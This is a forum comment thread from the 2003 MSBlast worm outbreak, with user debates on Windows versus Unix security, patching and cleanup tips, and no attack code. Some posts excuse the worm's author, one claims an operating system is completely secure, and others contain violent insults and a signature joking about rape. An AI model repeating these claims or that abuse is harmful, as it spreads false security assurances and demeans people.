You must be young. "Virii" are almost exclusively a Microsoft phenomenon and have been since Microsoft had very small market share due to the poor security and "always root" nature of the OS. You are trying to use windowspeak to describe other things. The only significant UNIX worm was the sendmail worm. Other than that, there hasn't really been much. There was the DNS/Bind worm a little while back, but it didn't propogate nearly as fast due to the increased diligence your average UNIX admins has compared to the typical "set it and forget it" attitude that's popular with the windows family of server OS's. Growing up during the time, problems with "trojans" and worms and whatnot were never really that big of an issue with UNIX because the barrier for entry was enormous. You had to understand a great deal about C, socket code, and other not easily obtainable bits of knowlege to even begin. Most "hackers" weren't malicious when UNIX ruled 90 percent of the roost. Only with the coming of Microsoft did the true rise of the "script kiddy" occur. When it became easy for any moron to download precompiled crap and run it on their windows box to attack other windows machines is when there was truly "TONS" of this kinds of stuff. Very sad, but very true. Windows is a target because it's a very easy target. These people are lazy. Windows is shooting fish in a barrel compared with having to deal with obtaining root permissions, or the ridiculously rapid rate with which UNIX systems are patched, and get patches. With most UNIX systems, a patch is out in HOURS as apposed to weeks or months with microsoft sometimes. There is a fundemental difference is how things are done in both camps. Microsoft could learn a great deal from UNIX if they'd bother. They only have about 50 billion dollars to spend on making their systems better yanno. I'd think that would be pretty obvious to even the most biased sympathizer.
For every annoying gentoo user, are three even more annoying anti-gentoo crybabies. Take Yosh from #Gimp for example.
Apache is the most popular web server. It gets hammered harder by the script kidiies than IIS.
Who installed the logic module in your brain?
IANAL but write like a drunk one.
I'm a sys admin for a hospital, we simply dont have the funding for nice stuff like that or enough IT staff. We just gotta make do with what we got.
PLease use the correct terms, we are suppossed to know the lingo.
IANAL but write like a drunk one.
What makes you think it's real money. Have you seen it?
Or is it an urban legend built on Enron-style accounting practices?
The ability of ms programmers should be commended. Like clockwork they ensure people must update their software every week and upgrade it every couple of years.
This business strategy of having your customers depend on you to prevent these pathetic hacks works well for them. What other company in these times has $50 billion in cash?
The only thing that can help or even fix this is competition. We all know that's not going to be from apple anymore, so maybe linux.
The worm contains the following text, which is never displayed:
So it seems the creator did have a point to prove.
How could I say to men: "Speak louder, shout! For I am deaf!"? -Ludwig van Beethoven
...we will see some kind of press release from SCO reminding us how bad IBM & Linux is, just to help divert our attention away from the current chaos of this Microsoft worm.
:)
Just one for the MS/SCO conspiracy theorists
"Hey! Unless this is a nude love-in, get the hell off my property!!"
Get it through your thick skull. You're a no talent, fucking moron. You never had, don't have, and never will have any skill on this website. It's better for you to just leave while we are being so polite. It will get much uglier, believe us.
IIS is a Swiss Army knife.
I run Apache precisly because it doesn't do anything extra. Lack of functionality doesn't make it more secure than something of greater functionality. It's apples and oranges. As someone else mentioned, Apache has modules that open up the same/similar vulnerabilities as IIS.
IIS gets hacked from remote administration exploits and the fact it's tied in the to OS. Which is precisly why I dumped Linux which stupidily ties in FTP to the OS.
App accounts should NOT be system accounts. If I want to have the same user and pass for HTACCESS, FTP, SMTP, POP3, and VNC, I'll set up the seperate programs handling them to have the same user and pass in their respective account files. I don't want the OS to handle all the passwords. When you do that, then getting a password means you have access at some level to the OS which leads to escelation hacks. The intelligent way where say an FTP count has nothing to do with a system account, getting a username/pass only gets you into the FTP account.
If you get a password for my mail server, worst case you can read my e-mail. If you get a password for FTP, worst case you can change some files.
Ben
Work Safe Porn
Microsoft is already on it. The whole .NET initiative. You didn't think they were going to keep on keeping on with the old ways, did you? Subscription software all the way. They'll make more money that way, and with them in control of your system, the problems seen here will go away, i.e. every one of the problem machines out there right now would already have been patched automatically.
This whole crisis is an opportunity for Microsoft to hype what they've been hyping recently (subscription software, downloaded from MS regularly).
A Good Intro to NetBS
Yep. They're stupid idiot users.
Keep insulting them. They'll grow to love Linux with advocates like you harping at them.
I thought Apple had a new enterprise software rollout....
That's the sort of situation I was talking about. Or situations where company x was paralyzed because company y's network was down, but (after I actually think about it for a second) it seems to me that almost any case like that would be covered by some sort of contract, whether y was an ISP or a datacentre or whatever. However, it still seems to me that there's a certain sense in which the Internet is a commons, and we may end up with the government regulating networked computers as such. Depending on the scale of the infection, the DOS on the 16th could make the whole bloody net crawl, if too much bandwidth is consumed. Enough occasions like that might motivate the government to impose more standards on system maintenance.
Uhhh.. no. This is a side effect of a homogenized world. It's no different than growing a forest of cloned trees, or a race of cloned people. Because they are all identical, they all suffer the same weaknesses. As a result an infestation that would ordinarily kill hundreds instead ends up killing off the whole forest - or an entire race.
If everyone had macs (or linux) virus writers would be targeting macs or linux. The problem isn't just windows: it's that a single OS - a single "species" - is far too pervasive.
"I'm unaware of the [Microsoft] patch being available," said David Hugel, the deputy chief administrator of the MVA. "I've talked to our IT people and we weekly update the virus protection we do have, and this just happened to fall between those points when we had updated it and we didn't have the [new] update available yet."
How about downloading security patches, too?
I suppose Skynet 1.0 is released soon.
Enevitably, some report will appear in the papers saying the MSBlast worm caused $ X million worth of damage, but really we've been lucky so far with Malisa, Code red, Simba etc. None of them have had any serious payload. I think people forget the real harm that the virus author could have caused if he/she so wished (corrupting your data files, or formating your harddisk, for example).
" How do you know this person was trying to get people to switch to Linux (or anything non-MS)? S/he could just be an ordinary asshole, without a point to prove."
Actually they want everyone to switch to Microsoft's Millenium Edition (ME) version of their operating system. This worm has NO effect on ME.
This virus also appears to cause the system to open the "My Documents" folder whenever a user logs on to the system, it opens that user's my documents folder (at least, that is what it seems like all three of the infected machines display this behavior)
most daemons/services are capable of authenticating users via PAM or from an SQL database.
for apache, PAM auth, mysql auth and postgresql auth.
for ftp you could use proftpd and ignore system accounts completely, it supports quite a few alternative methods.
for the email solution use something like vpopmail with no system users and supported by quite a few MTA/POP3 agents.
If you don't want the OS to handle the passwords, then you can set it up so it doesn't. By default system accounts are normally used which I assume is from the era of people having shells and doing * from it, ftp/read mails/etc in which case things would use the standard system accounts..
YOU ARE WRONG : Mac OS is 100% secure according to WWW consortium and SecurityFocus's extensive database of exploits.
Webservers wunning mac OS 7 through 9.2.2 (the latest) have never once been exploited in the history of the internet.
This includes load distributed webservers on MacOS run by army.mil and many large universities.
no mac have wever once been exploited because of technical achievements in the mac OS.
I am not talking about unix based "OS X" which has already had over 30 known security holes, I am talking about the 100% secure mac OS 9.
Therefore you are wrong.
Consult BugTraq if you doubt me.
Read and learn.
there are 100% secure OSes...
Happy patching.
Code is Speech. No to Censorship.
there is no "code" just a bunch of n00bs looking at packet captures while other people interject "whats a packet" and "if i knew about computers i would help" , hell they even reccomend Steve Gibsons site (grc.com) to check if they are infected and as anyone with a clue knows he's not worth listening to
of course if anyone has a complete dissasembly then post away , but at the moment there is nothing of value in any of dslreports threads
there is no "code" just a bunch of n00bs looking at packet captures while other
people interject "whats a packet" and "if i knew about computers i would help"
hell they even reccomend Steve Gibsons site (grc.com) to check if they are
infected and as anyone with a clue knows he's not worth listening to
of
course if anyone has a complete dissasembly then post away , but at the moment
there is nothing of value in any of dslreports threads
Not all hospitals do.
;)
I work for one of the largest health care systems in the US, and we didn't even hardly get touched by this new virus. We did have I think one office (NOT in a hospital, one of the 'corporate' ones) get hit by this, but it only affected a handful of users.
Then again, we are tortured by VMS and some Sun Mail programs...
I couldn't disagree more. While this virus writer did do something bad, it has good side effects.
Think about those government records, think about your info in those records.
Think about a cracker, think about a him stairing in disbeleif why his nmap scanner is picking up port 135 open on each computer. And all those computers are unpatched.
Think about that cracker exicute abritary code on those servers, undetected, unkown. Think about him downloading and installing a root kit and covering up his tracks. Think about this cracker working for a terrorist group.
Think about them having unfettered access to machines that have criminal databases and are used to authenticate and create new ID's.
This virus maker did use a favor. I'd rather have a government machine go down for a couple hours rather then have it under the control of a malisious hacker. At least this way they will get it patched.
Hey Guys and Gals,
:( Cut it out guys, every patch is another nail in the coffin (big picture here *nix guys don't go nuts).
No matter how we look at this - I personally find the fact that people continue to exploit disturbing. I mean seriously, why can't we save these things - for instance when MS does a major OS rollout in public?
Ok, I'm not being very clear - my concern is *Nix got so good because of years upon years of hacking, cracking, and fine tuning. As of right now MS isn't paying anyone to find holes (well presumedly), they are getting some pretty bright folks finding very good holes - they are PATCHING THEM. What does that mean? Pretty simple if you ask me, with each exploit and patch - MS is on its way to making a better, and better, oops another patch, and better OS. People aren't migrating like we thought they would - even with the hassle. So keep exploiting you morons - lets bring MS to its knees!!!! Yeah right - keep dreaming, keep finding the holes so MS coders can do their typical HALF *ssed job all the while allowing us to fine tune their OS.
It's not a new problem. Nor is any amount of wishful thinking is going to fix the problem, Microsoft's products just aren't engineered for security. It's a problem that would take years to fix. Bill Gates himself made allusions to the U.S. Apollo space program of the 1960's which was $25 billion over 10 years. However, for the time being, the security issue is treated like a PR problem and the customers are taking the lumps.
A this point the problem is sociological or psychological. Like any other cult, Microsoft provides a sense of purpose and belonging to it supporters. Note that neither a technical background nor even an analytical way of thinking is a prerequisite, thus fulfilling even the unconditional acceptance aspect of a cult.
As much as IT staff and, especially IT manangers, admire the personal wealth of Bill Gates, they just need to be able to let go of Windows and move on.
Move on, either to Macintosh or Linux or QNX or BSD or Novell there are many choice. There will be some up front costs, but even without the viruses and worms these upfront costs will be offset by the number of maintenance hours saved.
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
Let's try to imagine if it carried a Chernobyl-like payload, or the feared root name server DDoS. Man, that's scary. So, the first one with an exploit ruins it for the rest, as at least some of the world finally realizes that it needs to patch, rendering the real killer-virus less effective, should it ever see the light of day.
I guess in that context, we should be grateful. It's kinda like if your're walking down the street in a bad neighborhood. Wouldn't you rather have some a**hole just slap you in the face, rather than said person walking up and shooting you?
Actually, several anti-virus companies named this worm W32/Blaster. There ought to be some kind of campaign to make sure people call it W32/Blaster, and not just Blaster. Where's RMS when you need him?
I do not know the intentions of the creator of this virus/worm, but it could have been a lot more malicious. It will hopefully be a wake up call to people to secure their systems, before something really bad is unleashed.
you should probably think about spending a few billion on making products that don't cost your customers insane amounts of money and lost productivity due to down time because of pathetic security and coding practices.
Yeah right, how are you going to get them to buy Windows ZP 2005 then?
Just because you're paranoid doesn't mean there isn't an invisible demon about to eat your face
This virus patched billions of systems in a quick amount of time. With these systems unpatched... Much worse things could have happened. The virus maker did Microsoft a favor by releasing this. He made it annoying as possible without doing any serious damage. Making it annoying made you do something to fix it.
And if you didn't patch, well it's your fault. You were bound to get your system ripped open sooner or later anyway. So now your system is fixed.. You are less likely to recieve a virus that will destroy your system.
Especially since writing a Windows virus is easier than trying to get the dependancies straight for all of the packages I want installed.
Microsoft did make the patch available well before the worm was unleashed. If people would regularly check "Windows Update" (http://windowsupdate.microsoft.com), or enable Microsoft's Update download capability, this would NOT be an issue!
For anyone who thinks that viruses are developed by those selling anti-virus products, consider this quote from Al Huger, senior director of engineering at Symantec: "The worm was intended to co-opt your computer for its plan, but it is badly written," said Al Huger, senior director of engineering at Symantec Corp.'s Calgary security response unit. "If the writer of this worm had got it right, it would have been unlikely that most people could have accessed their computers this morning." It sounds to me like he's pissed off that one of his employees didn't do a better job.
Obviously there were thousands upon thousands of computers still vulnerable to this exploit when this worm was released. I honestly think that this particular worm has done the world a favor - a security hole this critical was BOUND to be exploited sooner or later. Better that this relatively harmless "vaccine" force everyone to patch their systems now. That way, when REAL malicious exploits hit - that actually delete files and destroy your work - most systems will no longer be vulnerable.
Heck, I'd almost wager that Microsoft released the bugger themselves in order to reduce the impact of the next big one...
I have a friend the the GSA, and I told him this was going to be comming last thurs. He told his bosses, the told him, "We could get most of them upgraded, but it would be a lot of work. F*ck it" Needless to say most of there office went down, as did many of the gov't key GSA databases. It's not really funny, but....Ha Ha.
...if they used linux in the first place, why the hell do they care about M$? To me this stinks of disgruntled windows user.
This virus talk is rubbish. I'm typing this on a Windows computer right now and everything is working fi
Various Arkansas Government agencies are afflicted, too.
What those who want activist courts fear is rule by the people.
And people pay for it tooo!!! what a racket!
and how many switched after Code Red? ILoveYou? the countless others? Those who got inffected either had someone take care of it or just reinstalled the system. This is what they are trained to do and expect it with computers.
I agree with your premise and disagree with your conclusion.
Microsoft has trained people to think that "computers are unstable" and "computers need to be rebooted frequently to fix problems". This is what they are trained to do and expect it with computers.
Viruses are different. People can understand needing to "turn it off and turn it on again" to fix a problem. Viruses are scary. Viruses will "erase your hard drive"! People have been hearing for the past two days that viruses affect "any computer running Microsoft", and people are also aware that there are alternatives to Microsoft.
I think repeated virus attacks will drive people away from Microsoft in greater numbers than Microsoft-imposed instability ever did.
I don't make the rules. I just make fun of them.
but to be slow at patching servers and systems is just plain stupid. Any system not patched up when you had a month to get the patch deserves to be hit hard. Lazy sysadmins need their asses handed to them, it will weed out the weak and we intelligent people will get the better pay. It's good for all of us in the long run.
W32/Blaster delivers its payload against windows update -- on the 16th. Debian turns 10 -- on the 16th. Coincidence? I think not!
Three weeks ago we released information to all employees about this exploit and demanded that they patch their systems immediately. We made it convenient, simple, and mandatory. For the most part people patched, but those 300 or 400 people that were either to busy, too lazy, or just plain stupid cost us a lot of money and downtime. We've mopped up the last of the outbreak, but the damage to our business and our image is going to take a long time to heal.
Yes Microsoft Products are flawed, and vulnerable, but whining about it isn't going to change a thing. All you can do is plan for the worst and do your best to keep your company alive; after all they are the ones who cut the checks which allow you to pay for the right flame all you want on Slashdot
My $.02
This would be a lot nastier than a harddrive wipe.
With the wipe, you know it's all gone...just reload the backups.
With screwing the data...what's right? what's not?
That could truly be a costly virus...costly in many ways.
Sean D.
"Hmm. I am to metaphor cheese as metaphor cheese is to transitive verb crackers!"
Yes they have 50 Billion dollars, and guess what they want more. They don't care about the value they put in their products. They make a shitty product, then surround it with a EULA saying if it breaks it's your fault and we can search your computer, if you leave this this and that on. Though you can blame them on this since they did release a patch a month ago, however I guess you could still blame them because the vulnerability is in NT4(which again since we're lazy assholes, we won't fix NT4 just like the last time) which is how old? It had 6 service packs, and yet they couldn't fix the problem within one of those. I've talked to be about how Microsoft is a monopoly and why Windows is bad, and they all come back saying, well Microsoft is a good company, nobody is forced to buy Windows, their a monopoly because they had good buissness practices. If people actually understood what Microsoft does illegally, and why Windows is terribly insecure(hey if you want you can use that as FUD, terroists can break into Windows easily, then again its not far from the truth)I'm sure there could be a massive pull out, in the longterm.
But then the issue is one of resources, pure and simple. So when government agencies and public institutions (like my buddy's university) have their networks go down, this is a direct result of underfunding. And underfunding is your tax cuts at work (your jurisdictional mileage may vary).
First, you are shooting yourself in the foot every time you make an argument and label it "simple". If the issue were really so simple, then its simplicity would be self-evident and you wouldn't need to label it as such. The very fact that you feel compelled to tell someone that it's "simple" generally means that it is anything but. (The same thing goes for arguments labeled "clear" or "obvious".)
Second, a government organization which lacks resources may lack resources do to poor budgeting (i.e., money going towards pork rather than to that which makes government function). Government at all levels spends money on pork. After tax cuts, governments could have reworked their budgets (you know, like us regular folk who don't have the power to plunder at whim have to do) and cut out pork, redundency, overspending, etc. But, then again, what about all those precious votes? I'm sure there's plenty of politicians who are compeletly willing to let their server farms crash if that means saving their favorite vote-buying programs.
I don't make the rules. I just make fun of them.
In addition to the Maryland MVA, all the computers at the Montgomery County (just outside Washington DC) library system were hosed. When I went last night, they had the checkout system back up (the Post said that they had to do manual checkouts earlier in the day), but all of the public access computers were down with handwritten signs saying "Down due to virus attack".
This page accidentally left blank
I know /. is the place to bash the microsofties, but don't let it get to your head. Remember, anything with the name Microsoft gets instant press, outside the techies the public thinks "apache" is the old movie name for a First Nations tribe.
.exe. Even then you get guys like this story highlights:
I regularly do security audits of all kinds of systems. When I walk in to a microsoft shop I can immediately tell how it goes. If the sysop says "I don't trust the patches, I test them, but they're not deployed unless there's a REAL problem" It won't go well, those guys usually don't update virus files either. On the other hand if the sysop is using patch management practices he can often go out in real time and check the current status of a server, workstation, and active version of the virus definition file in realtime (they usually have good WRITTEN policies on unauthorized (untested) soft/hardware with sanctioned backup). I haven't found malware in any of the latter cases.
I've yet to find a good *.nix shop. They often have good processes and procedures that SHOULD avoid problems, but the truth is it's easier to sign a piece of paper that says sourcecode was patched and applied than to actually do it. Things look great on paper. Check the source or decompile sendmail (one of my favorite targets) and it's another story. I'm still finding the same hole T.Morris used years ago on active servers. The excuse is always the same, "that was the way it came, shouldn't that have been fixed in the distro by now?" (i.e. too lazy to look, just signed the paper). Many don't even check SANS or CERT regularly. At least windows will notify you when critical updates are available, and all you have to do to apply it is run the
"I'm unaware of the [Microsoft] patch being available," said David Hugel, the deputy chief administrator of the MVA. "I've talked to our IT people and we weekly update the virus protection we do have, and this just happened to fall between those points when we had updated it and we didn't have the [new] update available yet."
(How did this guy get his position or experience? Even "end-users" successfully use critical update with relatively NO technical experience or fiscal responsibility.)
Any sysadmin that can't keep a system patched, or falsifies patch records should be punished up to and including dismissal as far as I'm concerned.
Incidently, just so you know my audit document is the CERT advisories on securing systems. If you want a great basic book try OReillys "Practical Unix and Internet Security"
Has anyone figured out yet that as far as I'm concerned the problem is NOT theoretical design differences in OSs as much as the incompetance of the people running them?
It doesn't matter what you wrap your emotions around, Reality is a brick wall specifically designed to scramble eggs
I was not trying to be anti-MS and I belive my statement about using a non MS email client and browser will definately reduce your risk of viruses and not only because they are not as homogeneous as you claim but because they are NOT integrated into the OS and NOT tied to multiple core functions of the OS that allow these worms to work as efficently as they do. That is a fundamental issue that will always make any closely tied system at risk. The use of raw data and application code and executing them from an application that is tied directly to the core of the OS will ALWAYS be harder to maintain security then a system that does not have this integration. That is a fact no matter which way you look at it. People are always told to not run an unknown executable file. Well any time you deal with documents, emails, web pages, help files from any JoeBlow on the internet on a MS Windows system, you are dealing with files that can and will execute code. Couple that with a known weakness elsewhere in the system and you have a new worm and or a virus. This is the basis for almost every major worm and email virus for the past 5 years.
Bad boys rape our young girls but Violet gives willingly.
"...plant designers and control software writers tend to stick with well documented comodity hardware (Win32)."
Win32 well documented? You are kidding, aren't you!!!? Well documented software is where you have the source code or at least when you are dealing with a highly ethical software developer!
And if you are a serious businessman, everything you do should be critical and expensive! Otherwise, you are just wasting time and money.
I think the best side-effect of this virus/worm is the CNN poll it spawned, which revealed that more than 40% of those polled are completely clueless.
Everyone is commenting that the sys-admins should have updated their systems. The company I work for got railed by the worm, all of our PCs, and all of our servers. Why weren't they patched? Because corporate policy says that we aren't to install service packs, security patches, you name it. We were certainly aware of the security bulletins, we just couldn't do anything about it. Might be about time to start freshening up my resume.
...something like 97% of the worlds worm/virus designers spend 100% of their time on trying to torpedo Windows. I wonder the people using Linux or any other Unix/Unix clone would do if they got that sort of non stop attention. Please note also that it is perfectly possible to harden Windows to the point that it will withstand all but the most determined of attacks. I know because I am responsible for a pool of Windows servers who never noticed this virus exists because I patch regularly, installed anti-virus and software, a firewall and took a number of elementary precautions way before this thing ever hit the net.
"....if you dont know something is dangerous it is your own damn stupid fault!!! Not the programmers's wrote your Open Source webserver so that it can be run as root on port 80!".
Only to idiots, are orders laws.
-- Henning von Tresckow
So the Washington Post article require you to fill out their silly little survey before you read the article. The lower limit of the birth year field is 1900. Isn't it possible that someone older than 103 could concievably be online and looking at this article?
Dunno, I just found it interesting.
Why no Bill ~300 million windows machines are not spamming your website. How could they? They are not susceptible to computer viruses...it must be sumthing else...
entropy
"I know people are worried because we have a lot of personal information here. This all stored in what we call a 'Data Vault', and I want everyone to know that information was never in danger because it is not stored on a Microsoft system."
-- ac at work
Ok folks. Sorry fer jumpin on a thread.
:)
Guru help needed now.
Our home network has my box (knoppix) talking to net via parents win2000 box. Got call at uni. Computer haywire. Got home , sure enuff, theres msblaster doing its fandango.
So I get the cleaner clean it up, go to download the patch from ms site to avoid clean up and...... "Where the fsck is service pack 2?".
WTF?????
Anyway, the moral of the story is that service pack 2 is a humongous download thru a 56k modem, and the only way to block this bitch is via zonealarm..... *EXCEPT* that zonealarm free version kills NAT from the windows box.
Windows being as it is , lacks iptables, or any nifty stuff like that, so I'm confounded.
*IS* there a firewall , that like free and all, that doesnt waste ICS?????
Cos as it stands , this whole business of not being able to do assignments and stuff is REALLY getting me down.
Thankyou for listening. Hope you can help
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
The grandparent post provided a good argument. The parent post, however, simply responded with an immature red herring, in the form of a spelling-nazi attack. Since he was logged in at the time, he should be penalized.
Kill the paper MCSEs. Shoot them in their heads.
the only thing this WORM maker did was wake everybody up to install this one patch. people aren't gonna catch on that this is not a one-time occurence. it's gonna happen again and again. The guy that originially found the vulnerability reported it to microsoft a long time ago. then microsoft posted a patch a long time ago. all this virus writer did was prey on the fact that people don't update their machines like they should. i believe windows xp has automatic updates on by default and you have to turn it off explicitly. Why are all these end users turning off the auto update features. these are the same end users most slashbots say are incapable of understanding when the taskbar has been moved from the bottom of the screen to the side. Anyway I am rambling. What I am trying to say is sure, Microsoft's security is a bit lacking, but they patched the hole long before this expliot came out. The users are dumb for turning off auto-update. and the virus-writer is an asshole for vandalizing computers under the guise of "sending a message". Microsoft already had the message and already fixed this exact problem before the worm was ever released. I am not an MS fan, I use a mac myself, but jeez. they were on the ball this time. there are many programs released in the *nix world with security holes that were not forseen before too. these things happen, get over it. clearly the guilty party is the virus writer. If there was a problem with the locks on the doors of your car would you prefer someone to knock on your door and let you know that your lock can easily be circumvented, or would you want that same person to enter your house using that vulnerability in your door, invite some of his lockpicking friends over and then use your house as a homebase to do the same thing to other houses, so they can then use those houses for the same purpose as they used yours, and so on? Why is this criminal in the real world, but doing us a favor in the world of computers and i see since you mention terrorism that you have been sufficiently programmed by the mainstream media so I don't even imagine you have read this far.
Thanks for the eloquent post. You should have been modded at +5 under-rated as well. That's a point that I tried to make previously but I usually get modded down as a troll.
Why is it Microsoft's fault when THE PATCH WAS RELEASED A MONTH AGO? A simple ~800kb patch. The exploit even made a Slashdot headline, so it was well-reported.
The fault lies in those people who don't patch the operating system with the critical updates put out by its maker.
"Sufferin' succotash."
[and i am an idiot for not changing to plain-old-text] the only thing this WORM maker did was wake everybody up to install this one patch. people aren't gonna catch on that this is not a one-time occurence. it's gonna happen again and again. The guy that originially found the vulnerability reported it to microsoft a long time ago. then microsoft posted a patch a long time ago. all this virus writer did was prey on the fact that people don't update their machines like they should. i believe windows xp has automatic updates on by default and you have to turn it off explicitly. Why are all these end users turning off the auto update features. these are the same end users most slashbots say are incapable of understanding when the taskbar has been moved from the bottom of the screen to the side. Anyway I am rambling. What I am trying to say is sure, Microsoft's security is a bit lacking, but they patched the hole long before this expliot came out. The users are dumb for turning off auto-update. and the virus-writer is an asshole for vandalizing computers under the guise of "sending a message". Microsoft already had the message and already fixed this exact problem before the worm was ever released. I am not an MS fan, I use a mac myself, but jeez. they were on the ball this time. there are many programs released in the *nix world with security holes that were not forseen before too. these things happen, get over it. clearly the guilty party is the virus writer. If there was a problem with the locks on the doors of your car would you prefer someone to knock on your door and let you know that your lock can easily be circumvented, or would you want that same person to enter your house using that vulnerability in your door, invite some of his lockpicking friends over and then use your house as a homebase to do the same thing to other houses, so they can then use those houses for the same purpose as they used yours, and so on? Why is this criminal in the real world, but doing us a favor in the world of computers and i see since you mention terrorism that you have been sufficiently programmed by the mainstream media so I don't even imagine you have read this far.
Microsoft recently released the Software Update Service for Windows 2000. You don't need AD to use it. You set a server on your network to grab the updates from M$ and it then updates your internal systems. It's a bare bones implementation, but at least you don't need to rely on users to patch systems. As you have seen, 100% compliance is impossible, and all you need is one hole... I am a SysAdmin in an all Windows shop; I keep my servers patched and my virus scanners up to date, and I haven't had a problem in the two years I have been in this position. It can be done.
"What the American public doesn't know is what makes them the American public." -Ray Zalinsky (Tommy Boy)
The patch was released a month ago. "This type of crap" wouldn't have happened if systems were patched. My network was 100% unscathed. There's a reason Microsoft puts out patches listed as "Critical Updates," y'know...
Here's the part where the Microsoft conspiracist or the EULA-hater chimes in.
"Sufferin' succotash."
... above the fold, top-right corner in the dead tree edition this morning, with a continuation on page 14 or so, and two articles on the facing page (one about the MVA getting hammered, one with detailed instructions on how to clean up your infected machine).
The headline was Internet Worm Targets Microsoft Windows. We'll know they really get it when the next headline is Yet Another Microsoft Worm Breaks Windows.
To a Lisp hacker, XML is S-expressions in drag.
I've seen a couple of XP machines that the OEM pre-install defaults to having updates switched off -- I guess the OEMs just don't want the hassle of users phoning them up asking whether or not to install the patch, or dealing with problems from broken patches. I wonder how many calls they're getting that the moment...
I ran Windows Update Tuesday morning. Tuesday afternoon, I got a copy of MSBlast.exe on my machine. Don't trust Windows Update to work correctly.
Question: Does Windows Update/Auto Update apply the DCom patch, or does it have to be applied separately? thanks.
...problem solved. (-:
/a" into is good medicine as well.
If you want to see your MS-Windows alive again, fill a suitcase with unmarked non-sequential medium-sized Bills... er, I mean, use Knoppix to download the patch(es), then reboot and apply them to 'doze toot-sweet before she reboots. Having a DOS window handy to type "shutdown
Got time? Spend some of it coding or testing
...just like they do for cars and such?
Got time? Spend some of it coding or testing
The FDA treats Blood Bank software in particular as if it were a "medical device" and requires much of the same kind of validation as any peice of medical hardware. I can't make a change in our blood bank software without filing FDA documentation.
The FDA is currently loking into requiring such documentation for Pharmacy software (at my work blood bank and pharmacy are known collectively as "the two places where a software bug can kill someone").
"Can't you see that everyone is buying station wagons?"
...if you're agoraphobic. (-:
Got time? Spend some of it coding or testing
Meanwhile, our couple hundred Linux servers keep chugging along unaffected.
Installing the free update has often been asking for trouble. Microsoft have an unenviable reputation for breaking things with their patches. This is kind of inevitable when they have such poor understanding of exactly what's going on inside their own (possession really is 9/10ths of the law) OS.
Just install Service Pack MAXINT. Problem solved. Hint: it has a penguin on it.
Got time? Spend some of it coding or testing
FTP is not "tied" into the OS. In fact, none of these services are tied into the OS. I run many servers and Full set of services: http, ftp, pop3, imap, ssh, smtp.... and none of them use a /etc/passwd file. In fact, they all come out of an LDAP store.
...so would you care to restate that "I'd trust the computers in a car before I trust" part? (-:
Got time? Spend some of it coding or testing
Being a long time resident of Philly, this doesn't surprise me at all. I've dealt with and know a few of the drones employed by the City. They'll maybe have it all fixed by Spring '04.
Heck, just last month, we almost killed a Supreme Court Justice during the dedication of the National Constitution Center:
http://www.nbc10.com/4july/2312737/detail.html
I just love this town (sneer)!
Political correctness is the newest form of slavery.
Just an example, the Windows update for L2TP/IPSec that interfered with customer's ability to connect to the internet. Thankfully, Microsoft removed the update and posted an updated version of the update but it goes to show that if system administrators installed every update just because Microsoft said so, there would be plenty more problems created than solved.
Prozac makes the voices in my head say nice things to me.
Read it and weep.
Got time? Spend some of it coding or testing
...load it from paper tape before you could start using it.
Got time? Spend some of it coding or testing
Yet another clueless person who doesn't realise that WinXP doesn't come with many applications, therefore decreasing the risk of bugs in code.
There's a reason I wrote "and many aren't in software that even has an equivalent included with Windows", you know. Try reading to the end of the post next time.
Why are all these end users turning off the auto update features.
Because they got burned once when Windows Update started sucking a serveral Gigabyte service pack over their modem connection?
Or maybe they got tired of having to wait throught the several download a patch that has to be applied seperately and reboot cycles when all they wanted to do was check the movie schedule for the local theater?
Or maybe a social engineered malware webpage changed the settings by telling them click the link and it will double thier intenet connection speed?
Or maybe they are so burned out with having to patch their system three times a week they just don't want the bother since after all it is someone else that is going to get the virus not them?
ad infinitum, ad nauseum
not to be an ass or anything, but it's a worm, not a virus ;)
I'd only trust my life to a machine that runs a completely custom OS built for one purpose that does one thing, and does it well
Yeah, and that's why I would only ever trust my life to an iPod.
At least make it painless.
Got time? Spend some of it coding or testing
If a system outside the modem/router can't access port 135 on the machine in question, you are REASONABLY safe for a few minutes until you have time to install the update.
If a system outside the router can't access port 135, why is it safe for only "a few minutes"?
I don't know if grc.com is the end-all of network security, but according to their port probe, my port 135 was "stealthed" just from the router NAT, even without ZoneAlarm running...
So how am I going to get this worm?
Why not create secure software.
... whoops ... I mean created WinNT they had a secure OS. Then they went and F**KED it!
When MS stole OS/2 3.0
There bottom line is profits. A product purposely broken is always upgraded. Not surprisingly the upgrades are never free. Not to mention the exploit was there way back in Win2000 !!!
These articles suggest that MS new about this fault for a month and that "experienced" sys admins were patching their systems.
I did a fresh install of w2k last friday and I installed every patch that was available. A patch for this worm was NOT on their site.
Using a different mail program doesn't help because many of these viruses carry a packaged version of Outlook Express mailer. I had a machine infected with one of these (different virus, at the time an unknown variant of an existing virus) - I identified it because it was sending mail using OE 5 and messages bounced back, but I was using Outlook as my mailer and had OE 6 installed with a Windows Service Pack for Win 2k (not 5).
:)
The only real solution is to throw out Windows... now if I can just convince management
cost your customers insane amounts of money and lost productivity
But isn't that exactly why people upgrade their MS OS? At a rediculous price I might add.
Of course you can prevent this bug from affecting your computer by using the built-in Windows program "dcomcnfg". You can use that program by disabling DCOM.
:)
Fortunately for me, I disabled this "feature" long before the worm started spreading. Some COM books mention this tool, and since I didn't think DCOM was useful for my computer, I disabled it
For the love of man and everything holy, USE A DAMN HREF and stop putting a space in root!
click
Slashdot still doesnâ(TM)t support Unicode after it was added to the HTML standard in 1997.
The now defunct @HOME had quite a few similar incidents with Sun boxes. The computers were stable and secure, but they had power cords!
Took a human with access to do damage after running fine for years. Not some pathetic virus.
Just a thought... But do they really use consumer grade computers? Maybe as terminals but last time I was in a hospital's computer room there were no windows boxes around. There was a Dec cluster, a solaris box maintinaing a huge optical library, and a bunch of shit off the set of "2001 a Space Odyssey".
Here's a rundown of what I've found out dealing with the MSBlast worm, some of which wasn't posted to the list yet (or I just missed it). Luckily my systems here were patched before this came out, but a few people brought in laptops that weren't patched, so here's what to expect.
/a" to abort the shutdown.)
MSBlast Symptoms:
Windows XP: Computer displays a message that the computer will shut down in 60 seconds.
Go to a command prompt and type "shutdown
This indicates that your computer is infected with the MSBlast worm.
Windows 2000: Computer displays an error message about "svchost.exe" fatal errors. Odd behavior follows, such as not being able to drag-and-drop certain items, Internet Explorer context menus (right click menus) don't work properly, and other bizarre behavior.
This _does_not_ necessarily mean that a computer has the worm, but the svchost.exe could be crashing as a result of the worm trying to get in. However, you should still run the removal tool to make sure.
